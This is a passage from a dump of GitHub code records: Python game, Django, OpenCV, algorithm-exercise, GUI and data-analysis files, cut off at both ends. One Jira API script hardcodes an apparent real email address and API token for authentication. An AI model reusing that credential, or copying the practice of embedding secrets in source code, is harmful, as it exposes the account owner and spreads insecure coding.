pygame.key.get_pressed()\n    player.update(pressed_keys)\n    \n    # move enemies\n    enemies.update()\n    \n    # screen manipulation\n    screen.fill((0, 0, 0))\n    surf = pygame.Surface((50, 50))\n    surf.fill((0, 0, 0))\n\n    # sprite manipulation\n    for entity in all_sprites:\n        screen.blit(entity.surf, entity.rect)\n\n    # detect collision\n    if pygame.sprite.spritecollideany(player, enemies):\n        player.kill()\n        running = False\n\n    pygame.display.flip()\n    clock.tick(1)\n","repo_name":"calebyhan/CalebHan","sub_path":"Projects and Applications/spaceship_pygame/spaceship_pygame.py","file_name":"spaceship_pygame.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42086019496","text":"from django.http import HttpResponse, HttpRequest\nfrom .models import Subscription\nfrom .Utils import batch_get_symbol_price\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import CustomUserForm, SubscriptionForm\n\n\n# Create your views here.\ndef user_home_page(request: HttpRequest) -> render:\n    if not request.user.is_authenticated:\n        return redirect(\"/users/login/\")\n    subscribed_stock = request.user.symbols.all()\n    query = [stock.symbol for stock in subscribed_stock]\n    prices = batch_get_symbol_price(query)\n\n    context = {'symbols': prices}\n\n    return render(request, 'home.html', context)\n\n\ndef register_user(request: HttpRequest) -> render:\n    if request.method == 'POST':\n        user_form = CustomUserForm(request.POST)\n        if user_form.is_valid():\n            user_form.save()\n            messages.success(request, \"Registration successful.\")\n            return redirect('/users/login/')\n        else:\n            messages.success(request, \"Registration not successful.\")\n    else:\n        user_form = CustomUserForm()\n    return render(request, './registration/register.html', {'form': user_form})\n\n\ndef delete_subscription(request: HttpRequest, symbol: str) -> render:\n    if not request.user.is_authenticated:\n        return redirect(\"/users/login/\")\n\n    symbol = symbol.upper()\n    target = Subscription.objects.filter(user=request.user, symbol=symbol)\n    if len(target) > 0:\n        target[0].delete()\n\n    return redirect(\"/stock/user_home_page\")\n\n\ndef subscribe_stocks(request: HttpRequest) -> HttpResponse:\n    if not request.user.is_authenticated:\n        return redirect(\"/users/login/\")\n\n    if request.POST:\n        target_stock = SubscriptionForm(request.POST)\n\n        if target_stock.is_valid():\n            symbol = 
target_stock.cleaned_data[\"symbol\"].upper()\n if not Subscription.objects.filter(user=request.user, symbol=symbol).exists():\n entry = Subscription(symbol=symbol, user=request.user)\n entry.save()\n return redirect(\"/stock/user_home_page\")\n\n context = {\"form\": SubscriptionForm()}\n return render(request, \"subscribe.html\", context)\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the stock index.\")\n","repo_name":"Sheldonsu28/StockPriceDjango","sub_path":"source code/stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35548692792","text":"def findDup1(nums):\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] == nums[i-1]:\n return nums[i]\n\nnums = [1,3,4,2,2]\nprint(findDup1(nums))\n\n# O(nlogn) time\n# O(1)\n\ndef findDup2(nums):\n visited = set()\n for num in nums:\n if num in visited:\n return num\n visited.add(num)\n\nprint(findDup2(nums))\n\n# O(n) time\n# O(n)","repo_name":"davidcparkk/prep_work","sub_path":"Python/leetcode/287_find_dup.py","file_name":"287_find_dup.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38788036453","text":"\"\"\"\nListing 2.55\n\nThe bisect module provides two ways to handle repeats. New values\ncan be inserted either to the left of existing values, or to the\nright. The insort() function is actually an alias for insort_right()\nwhich inserts an item after the existing value\nThe corresponding function insort_left inserts an item before the\nexisting value\n\"\"\"\nimport bisect\n\n\ndef main():\n values = [14, 85, 77, 26, 50, 45, 66, 79, 10, 3, 84, 77, 1]\n\n print(\"New Pos Contents\")\n print(\"___ ___ ________\")\n\n l = []\n\n for i in values:\n position = bisect.bisect_left(l, i)\n bisect.insort_left(l, i)\n print(f\"{i:3} {position:3} {l}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/python3-standard-library-solutions","sub_path":"Chapter02/0055_bisect_example2.py","file_name":"0055_bisect_example2.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22404833706","text":"\nimport requests\n\n\nurl = \"https://sample-project-anirudh.atlassian.net/rest/api/3/search\"\n\nheaders = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\"\n}\n\nquery = {\n 'jql': 'project = PS'\n}\n\nresponse_=requests.get(url, headers=headers, params=query, auth=('anirudhpunaruru1999@gmail.com', 'ufrEHjE9u76HvTplXckS1857'))\ndata= response_.json()\nissues= data['issues']\nfor issue in issues:\n key= issue['key']\n issue_url= 'https://sample-project-anirudh.atlassian.net/rest/api/3/issue/'+key\n res= requests.get(issue_url, headers=headers, auth=('anirudhpunaruru1999@gmail.com', 'ufrEHjE9u76HvTplXckS1857'))\n data= res.json()\n print(data['fields']['status']['name'])\n\n\n\n","repo_name":"anirudh-punaruru/jiraApiInVscode","sub_path":"jiraApi.py","file_name":"jiraApi.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43414032215","text":"import cv2\r\nimport numpy as np\r\nimport os\r\n\r\nclass ImageProcessing:\r\n \r\n def __init__(self):\r\n super().__init__()\r\n\r\n def write_image_file(self, path, 
img):\r\n cv2.imwrite(path, img)\r\n\r\n def bcg_lookup(self, img, alpha, beta):\r\n img = np.uint8( np.clip ( ( alpha * img + beta) , 0, 255))\r\n return img\r\n\r\n def gray_scale(self, img):\r\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n return img\r\n\r\n def binarize(self, gray_img, min_valve = 150 , max_valve = 255 , inverse = True):\r\n if(inverse):\r\n _, img = cv2.threshold(gray_img, min_valve, max_valve, cv2.THRESH_BINARY_INV)\r\n else:\r\n _, img = cv2.threshold(gray_img, min_valve, max_valve, cv2.THRESH_BINARY) \r\n return img\r\n\r\n def morphology_fill(self, binary_img):\r\n img = binary_img.copy()\r\n img_inv = img.copy()\r\n highth, width = img.shape\r\n #print(\"highth = \", highth, \"width = \", width)\r\n mask = np.zeros((highth + 2, width + 2), np.uint8)\r\n cv2.floodFill(img_inv, mask, (0, 0), 255)\r\n img_inv = cv2.bitwise_not(img_inv)\r\n img = cv2.bitwise_or(img, img_inv)\r\n #cv2.imshow(\"img_inv\", img_inv) // fill\r\n #cv2.imshow(\"img_\", img)\r\n return img\r\n\r\n def erode_dilate(self, img, erode_or_dialate, iteration, kernal = (5, 5)):\r\n kernal = np.ones((kernal), np.uint8)\r\n if erode_or_dialate:\r\n img_out = cv2.erode(img, kernal, iterations = iteration)\r\n else:\r\n img_out = cv2.dilate(img, kernal, iterations = iteration)\r\n return img_out\r\n\r\n def remove_small_object(self, img, min_size):\r\n nb_obj, output, status, _ = cv2.connectedComponentsWithStats(img, connectivity=8)\r\n sizes = status[1 : -1]\r\n nb_obj = nb_obj - 1\r\n img_out = np.zeros((output.shape), dtype = np.uint8)\r\n for i in range(0, nb_obj):\r\n if sizes[i] >= min_size:\r\n img_out[output == i + 1] = 255\r\n nb_obj , _ , _ , _ = cv2.connectedComponentsWithStats(img_out, connectivity=8)\r\n return img_out, nb_obj\r\n \r\n def canny(self, img, kernal = (5, 5), threshold1 = 30, threshold2 = 100):\r\n blur = cv2.GaussianBlur(img, kernal, 0)\r\n edged = cv2.Canny(blur, threshold2, threshold1)\r\n return edged\r\n\r\n def draw_contours(self, edged, img, area_size_max = 50000, area_size_min = 4000):\r\n cnts_array = np.zeros((8,4))\r\n\r\n (cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = img.copy()\r\n cv2.drawContours(contours, cnts, -1, (0, 255, 0), 1)\r\n #cv2.imshow(\"contours\", contours)\r\n i = 0\r\n for(_, c) in enumerate(cnts):\r\n if (cv2.contourArea(c) < area_size_min) or (cv2.contourArea(c) > area_size_max):\r\n continue\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n if((x + y + w + h) == 0):\r\n break\r\n else:\r\n cnts_array[i][0] = x\r\n cnts_array[i][1] = y\r\n cnts_array[i][2] = x + w\r\n cnts_array[i][3] = y + h\r\n cv2.rectangle(img , (x , y) , (x + w , y + h) , (0 , 255 ,0) , 2)\r\n i += 1\r\n if(i >= np.size(cnts_array, 0)):\r\n break\r\n\r\n cnts_array = cnts_array[0: i, 0:4]\r\n cv2.imshow(\" rect_finded \" , img)\r\n return cnts, cnts_array\r\n\r\n def get_subROI(self, img, rect_tuple):\r\n sub_img = img.copy()\r\n (x1, y1, x2, y2) = rect_tuple\r\n if(x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0):\r\n sub_img = img\r\n else:\r\n sub_img = sub_img[int(y1): int(y2), int(x1) : int(x2)]\r\n return sub_img\r\n\r\n def histogram(self, img):\r\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\r\n sum_hist = 0\r\n c = 0\r\n for value in hist:\r\n sum_hist += (c * value)\r\n c += 1\r\n\r\n if(c == 0):\r\n sum_hist = 0\r\n else:\r\n sum_hist /= (img.shape[0] * img.shape[1])\r\n\r\n return sum_hist\r\n\r\n def get_image_bool_matrix(self, img, matrix_size = 9, valve = 128):\r\n img_bool_matrix = 
np.full((matrix_size, matrix_size), False, dtype=bool)\r\n pixel_width = img.shape[1] / matrix_size\r\n pixel_highth = img.shape[0] / matrix_size\r\n for iy in range (0, matrix_size):\r\n for ix in range(0, matrix_size):\r\n sub_image_rect = (pixel_width * ix, pixel_highth * iy, \r\n pixel_width + pixel_width * ix, \r\n pixel_highth + pixel_highth * iy)\r\n if(self.histogram(self.get_subROI(img, sub_image_rect)) >= valve):\r\n img_bool_matrix[iy][ix] = True\r\n else:\r\n img_bool_matrix[iy][ix] = False\r\n return img_bool_matrix\r\n\r\nclass AdvanceImageProcessing(ImageProcessing):\r\n def get_patterns_bool_matrix(self, patterns_path, number_of_matrix = 8, matrix_size = 9):\r\n tmp_patterns_bool_matrix = np.full((number_of_matrix, matrix_size, matrix_size), False, dtype = bool)\r\n i = 0\r\n for path in patterns_path:\r\n img = cv2.imread(path)\r\n img = self.gray_scale(img)\r\n img = self.binarize(img, 150, 255, True)\r\n tmp_patterns_bool_matrix[i] = self.get_image_bool_matrix(img, matrix_size, 128)\r\n i += 1\r\n i = 0\r\n patterns_bool_matrix = np.full((number_of_matrix, matrix_size - 4 , matrix_size - 4), False, dtype = bool)\r\n for bool_matrix in tmp_patterns_bool_matrix:\r\n bool_matrix = np.delete(bool_matrix, [0, 1, 7, 8], 0)\r\n bool_matrix = np.delete(bool_matrix, [0, 1, 7, 8], 1)\r\n patterns_bool_matrix[i] = bool_matrix\r\n i += 1\r\n return patterns_bool_matrix\r\n\r\n def get_image_pattern_contours(self, source_img, threshold_min_valve = 150, threshold_max_valve = 255, canny_kernal = (5, 5), canny_threshold1 = 30, canny_threshold2 = 100, show = False):\r\n source_img = self.gray_scale(source_img)\r\n bin_img = self.binarize(source_img, threshold_min_valve, threshold_max_valve, True)\r\n #morphology_img = self.morphology_fill(bin_img)\r\n edged_img = self.canny(bin_img, canny_kernal, canny_threshold1, canny_threshold2)\r\n if show:\r\n cv2.imshow(\"gray_scale\", source_img)\r\n cv2.imshow(\"binary_img\", bin_img)\r\n cv2.imshow(\"edged_img\", edged_img)\r\n\r\n _ , cnts_array = self.draw_contours(edged_img, cv2.cvtColor(source_img, cv2.COLOR_GRAY2RGB))\r\n cnts_array = np.flip(cnts_array, 0)\r\n return cnts_array\r\n\r\n \r\n def get_pattern(self, source_img, patterns_bool_matrix, matrix_size = 9, valve = 128):\r\n source_bool_matrix = np.full((matrix_size, matrix_size), False, dtype = bool)\r\n pattern_score_matrix = np.zeros((5,5)) #Create a zeros array to compute the score of pattern compare.\r\n source_bool_matrix = self.get_image_bool_matrix(source_img, matrix_size, valve) #Get bool matrix from image\r\n global_score = 0\r\n pattern_index = 0\r\n def matrix_convolotion(source_matrix, pattern_matrix):\r\n score = 0\r\n tmp_source_matrix = np.full((matrix_size - 4, matrix_size - 4), False, dtype = bool)\r\n score_source_matrix = np.copy(tmp_source_matrix)\r\n for ix in range(1, 4):\r\n for iy in range(1, 4):\r\n tmp_source_matrix = source_matrix[ix:ix+5, iy:iy+5]\r\n score_source_matrix = np.logical_or(np.logical_and(tmp_source_matrix, pattern_matrix), np.logical_and(np.bitwise_not(tmp_source_matrix), np.bitwise_not(pattern_matrix)))\r\n local_score = np.sum(score_source_matrix)\r\n if(local_score > score):\r\n score = local_score\r\n else:\r\n score = score\r\n return score\r\n loop_index = 0\r\n for pattern in patterns_bool_matrix:\r\n score_return = matrix_convolotion(source_bool_matrix, pattern)\r\n if(score_return > global_score):\r\n global_score = score_return\r\n pattern_index = loop_index\r\n else:\r\n global_score = global_score\r\n loop_index += 1\r\n\r\n 
return pattern_index\r\n","repo_name":"yuyun-liu/-Python-PatternDetect","sub_path":"Lib/GetPattern.py","file_name":"GetPattern.py","file_ext":"py","file_size_in_byte":8416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464720185","text":"# word_search.py\nfrom typing import List\n\n\ndef exist(board: List[List[str]], word: str) -> bool:\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n rows = len(board)\n cols = len(board[0])\n\n def backtrack(i, y, x):\n if i == len(word):\n return True\n if y < 0 or y >= rows or x < 0 or x >= cols:\n return False\n if board[y][x] != word[i]:\n return False\n\n board[y][x] = \"#\"\n ret = False\n for k in range(len(dx)):\n ny = y + dy[k]\n nx = x + dx[k]\n if backtrack(i + 1, ny, nx):\n ret = True\n break\n board[y][x] = word[i]\n\n return ret\n\n for y in range(rows):\n for x in range(cols):\n if backtrack(0, y, x):\n return True\n\n return False\n\n\nif __name__ == \"__main__\":\n board = [\n [\"A\", \"B\", \"C\", \"E\"],\n [\"S\", \"F\", \"C\", \"S\"],\n [\"A\", \"D\", \"E\", \"E\"],\n ]\n\n print(\"=====Example 1=====\")\n word = \"ABCCED\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n print(\"=====Example 2=====\")\n word = \"SEE\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n print(\"=====Example 3=====\")\n word = \"ABCB\"\n result = exist(board, word)\n correct_result = False\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n\n board = [[\"a\"]]\n\n print(\"=====Example 4=====\")\n word = \"a\"\n result = exist(board, word)\n correct_result = True\n print(f\"Expected:\\n\\t{correct_result}\")\n print(f\"Output:\\n\\t{result}\")\n","repo_name":"giwankim/algo","sub_path":"leetcode/79-word-search/word_search.py","file_name":"word_search.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43721257112","text":"import tkinter as tk\nimport tkinter as ttk\nimport numpy as np\nimport math\nfrom tkinter import messagebox as msg \n\n#create GUI\nwin = tk.Tk()\nwin.title(\"SIMULASI BUFFON-NEDDLE\")\n\nttk.Label(win, text=\"SIMULASI BUFFON-NEDDLE\").grid(column=1, row=0)\n\ndef _msgBox():\n \"\"\"Menghitung peluang jarum terkena garis\"\"\"\n n1=0\n nt=0\n dr1 = int(d1.get())\n dr2 = int(d2.get())\n dr3 = int(d3.get())\n dr4 = int(d4.get())\n dr5 = int(d5.get())\n total_d= dr1+dr2+dr3+dr4+dr5\n\n while nt<=int(N.get()):\n r1=np.random.uniform()\n r2=np.random.uniform()\n tetha=r2*math.pi\n \n if r1 <= dr1/total_d:\n a=0.5*r1*dr1\n elif r1>dr1/total_d and r1<=dr2/total_d:\n a=0.5*r1*(dr1+dr2) \n elif r1>dr2/total_d and r1<=dr3/total_d:\n a=0.5*r1*(dr1+dr2+dr3)\n elif r1>dr3/total_d and r1<=dr4/total_d:\n a=0.5*r1*(dr1+dr2+dr3+dr4)\n elif r1>dr4/total_d and r1<=dr5/total_d:\n a=0.5*r1*(dr1+dr2+dr3+dr4+dr5)\n\n if a<= int(l.get())*0.5*math.sin(tetha):\n n1 +=1\n nt +=1\n p=n1/int(N.get())\n msg.showinfo('Peluangnya adalah',str(p))\n \nttk.Label(win, text=\"Masukkan jarak garis 1 dan 2 : \").grid(column=0, row=1)\nd1=tk.StringVar()\nd1_entered= ttk.Entry(win, width=12, textvariable=d1)\nd1_entered.grid(column=2, row=1)\n\nttk.Label(win, text=\"Masukkan jarak garis 2 dan 3 : \").grid(column=0, row=2)\nd2=tk.StringVar()\nd2_entered= ttk.Entry(win, width=12, 
textvariable=d2)\nd2_entered.grid(column=2, row=2)\n\nttk.Label(win, text=\"Masukkan jarak garis 3 dan 4 : \").grid(column=0, row=3)\nd3=tk.StringVar()\nd3_entered= ttk.Entry(win, width=12, textvariable=d3)\nd3_entered.grid(column=2, row=3)\n\nttk.Label(win, text=\"Masukkan jarak garis 4 dan 5 : \").grid(column=0, row=4)\nd4=tk.StringVar()\nd4_entered= ttk.Entry(win, width=12, textvariable=d4)\nd4_entered.grid(column=2, row=4)\n\nttk.Label(win, text=\"Masukkan jarak garis 5 dan 6 : \").grid(column=0, row=5)\nd5=tk.StringVar()\nd5_entered= ttk.Entry(win, width=12, textvariable=d5)\nd5_entered.grid(column=2, row=5)\n\nttk.Label(win, text=\"Masukkan panjang jarum : \").grid(column=0, row=6)\nl=tk.StringVar()\nl_entered= ttk.Entry(win, width=12, textvariable=l)\nl_entered.grid(column=2, row=6)\n\nttk.Label(win, text=\"Masukkan banyak jarum : \").grid(column=0, row=7)\nN=tk.StringVar()\nN_entered= ttk.Entry(win, width=12, textvariable=N)\nN_entered.grid(column=2, row=7)\n\nactio=ttk.Button(win, text=\"Proses\", command = _msgBox)\nactio.grid(column=2, row=8)\n\nd1_entered.focus()\nd2_entered.focus()\nd3_entered.focus()\nd4_entered.focus()\nd5_entered.focus()\nl_entered.focus()\nN_entered.focus()\n#start GUI\nwin.mainloop()\n","repo_name":"ramaprasyanto/teknik-simulasi","sub_path":"GUI_SIMULASI_BUFFON-NEDDLE.py","file_name":"GUI_SIMULASI_BUFFON-NEDDLE.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28594733447","text":"#13.ROT.cipher.py\n\nEnglish = ['a', 'b', 'c', 'd', 'e',\t'f', 'g', 'h', 'i',\t'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef rotate(alpha, m):\n return alpha[m:] + alpha[:m]\n\nm = int(input('Rotate: '))\nROTN = rotate(English, m)\ntranslator = dict(zip(English, ROTN))\nprint(translator)\n\nmessage = input('What is your message? ')\ndef encode(message):\n output = \"\"\n for i in message:\n #print(output)\n output += translator[i]\n return output\nprint(encode(message))\n\n\n#notes from class\n# for char in message:\n# index = alphabet.find(char)\n# encoded += rot13[index]\n# return encoded\n\n\n#Xavier's help.\n# translator = dict(zip(English, ROTN))\n# message = \"abcdef\"\n# def encode(message):\n# output = \"\"\n# for i in message:\n# #print(output)\n# output += translator[i]\n# return output\n# print(encode(message))\n# print(list(translator.keys()))\n\n# message = \"Hello\"\n# def encode(message):\n# for char in English == char in ROTN\n# return message\n\n\n\n\n\n#encrypting\n# message = input(\"What is your message? 
\")\n# key = 3\n#\n# # for symbol in message:\n#     if symbol.isalpha():\n#         num = ord(symbol)\n#         num += key\n#\n#         if symbol.isupper():\n#             if num >ord('Z'):\n#                 num -= 26\n#             elif num += 26\n#         elif symbol.islower():\n#             if num > ord('z'):\n#                 num -= 26\n#             elif num < ord('a')\n#                 num +=26\n#\n#         transalated += chr(num)\n#     else:\n#         transalated += symbol\n#     return transalated\n","repo_name":"rafawelsh/CodeGuildLabs","sub_path":"python/Python labs/13.ROT.cipher.py","file_name":"13.ROT.cipher.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2988502471","text":"# %%\nimport sys\nsys.path.append('../scripts')\nimport cellMorphHelper\nfrom cellMorph import imgSegment\n\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport pandas as pd\n\nfrom skimage.measure import regionprops\nfrom skimage.io import imread\n\nimport datetime\n# %%\nclasses = pickle.load(open('../data/fullClassificationAccuracy.pickle',\"rb\"))\n# %%\nwell = 'E7'\n\nclasses = [classification for classification in classes if classification.well == 'E7']\n\n# %%\nactualGrowth = {}\npredictedGrowth = {}\nfor classification in classes:\n    date = classification.date\n\n    pred0 = sum(np.array(classification.predClasses) == 0)\n    pred1 = sum(np.array(classification.predClasses) == 1)\n    \n    actual0 = sum(np.array(classification.actualClasses) == 0)\n    actual1 = sum(np.array(classification.actualClasses) == 1)\n\n    if date not in predictedGrowth.keys():\n        predictedGrowth[date] = [0, 0]\n        actualGrowth[date] = [0, 0]\n    \n    predictedGrowth[date][0] += pred0\n    predictedGrowth[date][1] += pred1\n\n    actualGrowth[date][0] += actual0\n    actualGrowth[date][1] += actual1\n\n\npredictedGrowth = pd.DataFrame(predictedGrowth).T.reset_index()\npredictedGrowth.columns = ['date', 0, 1]\n\npredictedGrowth['date'] = predictedGrowth['date'] - min(predictedGrowth['date'])\npredictedGrowth['date'] = predictedGrowth['date'].dt.total_seconds()/3600\n\nplt.rcParams.update({'font.size': 18})\nfig, ax = plt.subplots(figsize = (8, 6))\nfor spine in ['top', 'right']:\n    ax.spines[spine].set_visible(False)\nplt.scatter(predictedGrowth['date'], predictedGrowth[0], c = 'red', label = 'ESAM (-)')\nplt.scatter(predictedGrowth['date'], predictedGrowth[1], c = 'green', label = 'ESAM (+)')\nplt.xlabel('Hours')\nplt.ylabel('Predicted Growth')\nplt.savefig('../results/figs/predictedCocultureGrowth.png', dpi=600)\nplt.show()\n\nactualGrowth = pd.DataFrame(actualGrowth).T.reset_index()\nactualGrowth.columns = ['date', 0, 1]\n\nplt.figure()\nplt.scatter(actualGrowth['date'], actualGrowth[0], c = 'red')\nplt.scatter(actualGrowth['date'], actualGrowth[1], c = 'green')\nplt.show()\n# %%\ndates = {}\nfor c in classes:\n    imNum = c.pcImg.split('_')[2]\n    date = c.date\n    if date not in dates.keys():\n        dates[date] = []\n    dates[date].append(imNum)\n\nnIms = []\nfor date in dates.keys():\n    nIms.append(len(set(dates[date])))","repo_name":"TylerJost/cellMorph","sub_path":"notebooks/old/plotGrowth.py","file_name":"plotGrowth.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27636063171","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#resize the window containing the plots\nfig = plt.figure(figsize=(7,5))\n\nnames = ['Avi', 'Jacob', 'Michelle', 'Brandon']\nscores = [88, 57, 23, 25]\nscores2 = [92, 68, 85, 74]\n\npositions = 
np.arange(len(scores))\n\n#bars 1 and 2 must be set to the same width\nplt.bar(positions, scores, width = 0.3, color = \"orange\")\nplt.bar(positions + 0.3, scores2, width = 0.3 )\nplt.xlabel('Names')\nplt.ylabel('Scores')\nplt.title('Test scores')\n\n#change the position labels from numbers to names\nplt.xticks(positions+0.15, names)\n#after adding the second bar, the name positions must be shifted so it looks better\n\n\nplt.show()","repo_name":"0xRobert1997/HelloWorld","sub_path":"PythonAvi/DataAnalysis/BarChart.py","file_name":"BarChart.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27610744825","text":"__author__ = 'dan'\n\nimport os\nimport shutil\n\ndef clean_dir(dir, target_list):\n    for dirname, dirnames, filenames in os.walk(dir):\n        print('searching dir ' + dirname)\n        for subdirname in dirnames:\n            fqdir = os.path.join(dirname, subdirname)\n            if subdirname in target_list:\n                print('deleting ' + fqdir)\n                shutil.rmtree(fqdir)\n\n\ndef main(in_dir, targets):\n    print('starting for dir=' + in_dir + ' targets=' + targets)\n    target_list = targets.split('|')\n    clean_dir(in_dir, target_list)\n    print('finished')\n\n\nif __name__=='__main__':\n\n    args = { 'in_dir': '/BOGUS',\n             'targets': 'target|.svn|.mortar-local'}\n    model = main(**args)\n","repo_name":"ecodan/dpyutils","sub_path":"dir_cleaner.py","file_name":"dir_cleaner.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16690775971","text":"import logging\nimport os\nimport time\n\nfrom mars.scheduler.session import SessionManagerActor\n\nfrom ....config import options\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MARS_IDLE_TIMEOUT = 3 * 3600\nCUPID_LAST_IDLE_TIME_KEY = \"MarsServiceLastIdleTime\"\n\n\nclass CupidSessionManagerActor(SessionManagerActor):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        if \"MARS_INSTANCE_IDLE_TIMEOUT\" in os.environ:\n            self._idle_timeout = int(os.environ[\"MARS_INSTANCE_IDLE_TIMEOUT\"])\n        else:\n            self._idle_timeout = DEFAULT_MARS_IDLE_TIMEOUT\n\n        self._last_active_time = time.time()\n        self._last_active_time_from_service = None\n        self._check_started = False\n\n    def create_session(self, *args, **kwargs):\n        session_ref = super().create_session(*args, **kwargs)\n        self._last_active_time = time.time()\n        if not self._check_started and self._idle_timeout is not None:\n            from cupid.runtime import context\n\n            self._check_started = True\n            kv_store = context().kv_store()\n            last_idle_time_str = kv_store.get(CUPID_LAST_IDLE_TIME_KEY) or 0\n            _, self._last_active_time_from_service = self._get_service_activity_info()\n            if not last_idle_time_str:\n                self._last_active_time = self._last_active_time_from_service\n            else:\n                self._last_active_time = float(last_idle_time_str)\n\n            self.ref().check_instance_idle(_delay=10, _tell=True, _wait=False)\n            logger.info(\n                \"Instance will go timeout in %s seconds when no active sessions.\",\n                self._idle_timeout,\n            )\n        return session_ref\n\n    def _get_service_activity_info(self):\n        last_active_time = self._last_active_time\n        has_running = False\n        for ref in self._session_refs.values():\n            for info in ref.get_graph_infos().values():\n                if info.get(\"end_time\") is None:\n                    has_running = True\n                    break\n                else:\n                    last_active_time = max(info[\"end_time\"], last_active_time)\n            if has_running:\n                break\n        return has_running, last_active_time\n\n    def 
check_instance_idle(self):\n from cupid.runtime import context\n\n has_running, active_time_from_service = self._get_service_activity_info()\n if active_time_from_service != self._last_active_time_from_service:\n self._last_active_time = active_time_from_service\n self._last_active_time_from_service = active_time_from_service\n elif has_running:\n self._last_active_time = time.time()\n\n if self._last_active_time < time.time() - self._idle_timeout:\n # timeout: we need to kill the instance\n logger.warning(\"Timeout met, killing the instance now.\")\n self._stop_instance()\n else:\n kv_store = context().kv_store()\n kv_store[CUPID_LAST_IDLE_TIME_KEY] = str(self._last_active_time)\n self.ref().check_instance_idle(_delay=10, _tell=True, _wait=False)\n\n @staticmethod\n def _stop_instance():\n from cupid import context, ContainerStatus, WorkItemProgress\n from odps import ODPS\n from odps.accounts import BearerTokenAccount\n\n cupid_context = context()\n cupid_context.report_container_status(\n ContainerStatus.TERMINATED,\n \"Instance idle timed out, stopping\",\n WorkItemProgress.WIP_TERMINATING,\n )\n time.sleep(options.mars.container_status_timeout)\n\n # when instance is still not stopped, we kill forcifully\n bearer_token = cupid_context.get_bearer_token()\n account = BearerTokenAccount(bearer_token)\n project = os.environ[\"ODPS_PROJECT_NAME\"]\n endpoint = os.environ[\"ODPS_RUNTIME_ENDPOINT\"]\n o = ODPS(None, None, account=account, project=project, endpoint=endpoint)\n\n o.stop_instance(os.environ[\"MARS_K8S_POD_NAMESPACE\"])\n\n\ntry:\n from ...internal.core import DEFAULT_MARS_IDLE_TIMEOUT\nexcept ImportError:\n pass\n","repo_name":"aliyun/aliyun-odps-python-sdk","sub_path":"odps/mars_extension/legacy/actors/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"48"} +{"seq_id":"1108490986","text":"import copy\nfrom itertools import groupby\nfrom datetime import datetime\nfrom django.db.models import Q\nfrom django.contrib.auth.models import AnonymousUser\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import APIException\n\nfrom back_end.bilibili import get_anime_detail, search\n\nfrom models import Anime, Subscription, User, Season, Track\nfrom permission import ReadOnly, IsOwner, IsAuthenticated, IsSelf, AllowAny\nfrom serializers import AnimeSerializer, SubscriptionSerializer, UserSerializer, \\\n UserCreateSerializer, SubscriptionUpdateSerializer, SearchSerializer, \\\n SeasonSerializer, SubscriptionCreateSerializer, UserUpdateSerializer, \\\n TrackSerializer, UserProfileSerializer\nfrom constants import SUBSCRIPTION_FORGONE, SUBSCRIPTION_WATCHED, \\\n SUBSCRIPTION_UNWATCHED, SUBSCRIPTION_WATCHING\n\n\nclass AnimeViewSet(viewsets.ModelViewSet):\n queryset = Anime.objects.all()\n serializer_class = AnimeSerializer\n permission_classes = (ReadOnly,)\n\n\nclass SubscriptionViewSet(viewsets.ModelViewSet):\n permission_classes = (IsOwner, 